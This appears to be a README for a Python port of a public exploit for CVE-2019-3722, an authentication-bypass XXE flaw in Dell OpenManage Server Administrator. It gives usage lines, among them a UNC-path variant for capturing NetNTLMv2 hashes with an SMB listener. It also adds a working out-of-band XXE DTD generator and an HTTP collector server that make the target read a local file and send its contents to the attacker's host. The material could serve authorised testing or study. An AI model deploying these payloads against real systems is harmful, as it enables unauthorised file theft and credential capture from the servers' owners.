Description: A Python port of the exploit published at https://www.exploit-db.com/exploits/39909 (XML External Entity injection in Dell OpenManage Server Administrator, OMSA).
Versions Affected: confirmed on OMSA 8.3 and 7.3
Researcher: original research by hantwister; ported to Python by @daveysec
Disclosure Link: https://www.exploit-db.com/exploits/39909
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-3722
This abuses the way OMSA handles authentication: the script bypasses authentication and then makes the OMSA server issue a request back to your host. The response your host returns is processed by the server as XML, and an external entity in that response is resolved by the server (XXE), so the server ends up fetching whatever <path for XXE> points at.
Your attacking host must be reachable from the target on port 443; that is where the target connects back to fetch the attacker-controlled response, so nothing else may be bound to that port on <yourip> while the script runs.
Usage: CVE-2019-3722.py <yourip> <target:port> <path for XXE>
<target:port> is the OMSA web interface (1311 by default). <path for XXE> is the URI the OMSA server will resolve as an external entity; if it is an http:// URL you have to host that file yourself.
Example:
CVE-2019-3722.py 192.168.0.1 192.168.0.2:1311 http://192.168.0.1:8080/xxe.dtd
Or point it at a UNC path so the server authenticates to your host over SMB and you can capture its NetNTLMv2 hash (start an SMB listener such as Responder on <yourip> first):
CVE-2019-3722.py 192.168.0.1 192.168.0.2:1311 file://\\192.168.0.1
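An added example, not part of this script or hantwister's original exploit, of what the file behind <path for XXE> can be and how to host it on the port used in the example above: an out-of-band XXE DTD that makes the parsing host read a file and send it back to a collector, plus the small HTTP server that serves the DTD and records what comes back. It assumes the OMSA server loads the URL as an external DTD and processes the parameter entities in it; the file to read (C:/Windows/win.ini) and the /collect path are hypothetical choices for the example, and the XML the exploit script itself returns to the server is not reproduced here.

```python
"""Out-of-band XXE DTD and hosting server (added example, not the exploit script).

Assumption: the OMSA server resolves <path for XXE> as an external DTD and
processes the parameter entities declared in it. The file to read and the
collector URL are hypothetical values chosen for the example.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse


def build_oob_dtd(collector_url: str, target_file: str) -> str:
    """Return a DTD that makes the parsing host read target_file and send it to collector_url.

    %file;  is resolved on the victim from its own filesystem.
    %eval;  declares a second entity whose SYSTEM URL embeds the file contents
            (&#x25; is '%' escaped so it survives inside the entity value).
    %exfil; makes the victim request that URL, leaking the file in ?d=...
    Caveat: a file containing newlines or characters illegal in a URL usually
    breaks the outbound request; start with a small single-line file.
    """
    return (
        f'<!ENTITY % file SYSTEM "{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collector_url}?d=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def decode_exfil(request_path: str) -> Optional[str]:
    """Return the leaked contents carried in a collector request path, or None."""
    values = parse_qs(urlparse(request_path).query).get("d")
    return values[0] if values else None


class XXEHandler(BaseHTTPRequestHandler):
    dtd = ""      # set by serve()
    leaked = []   # everything the victim sent back, in order

    def do_GET(self):
        if self.path == "/xxe.dtd":                      # victim fetching the DTD
            body = self.dtd.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        data = decode_exfil(self.path)                   # victim delivering the file
        if data is not None:
            XXEHandler.leaked.append(data)
            print(f"[+] exfil from {self.client_address[0]}:\n{data}", file=sys.stderr)
        self.send_response(204)
        self.end_headers()


def serve(bind_host: str, port: int, collector_url: str, target_file: str) -> None:
    """Host /xxe.dtd and collect exfiltrated data until interrupted."""
    XXEHandler.dtd = build_oob_dtd(collector_url, target_file)
    HTTPServer((bind_host, port), XXEHandler).serve_forever()


if __name__ == "__main__":
    # Matches the README example: serve http://192.168.0.1:8080/xxe.dtd and
    # collect on the same listener. The target file is a hypothetical choice.
    ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
    serve("0.0.0.0", 8080, f"http://{ip}:8080/collect", "file:///C:/Windows/win.ini")
```

Run it on <yourip> before launching CVE-2019-3722.py with http://<yourip>:8080/xxe.dtd as <path for XXE>; the leaked contents show up on stderr. Because the data travels in a URL, files with newlines or URL-illegal characters usually make the outbound request fail, so confirm the channel with a small single-line file first.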